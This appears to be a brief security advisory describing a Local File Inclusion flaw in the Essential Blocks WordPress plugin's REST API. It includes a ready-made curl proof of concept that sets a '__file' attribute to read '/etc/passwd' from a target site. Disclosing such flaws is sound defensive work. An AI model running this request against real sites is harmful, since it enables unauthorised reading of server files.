Description The plugin does not prevent unauthenticated attackers from overwriting local variables when rendering templates over the REST API, which may lead to Local File Inclusion attacks.
curl --url 'http://vulnerable-site.tld/wp-json/essential-blocks/v1/queries?block_type=nonexisting_block&query_data=%7B%22source%22%3A+%22post%22%7D&attributes=%7B%22__file%22%3A+%22%2Fetc%2Fpasswd%22%7D'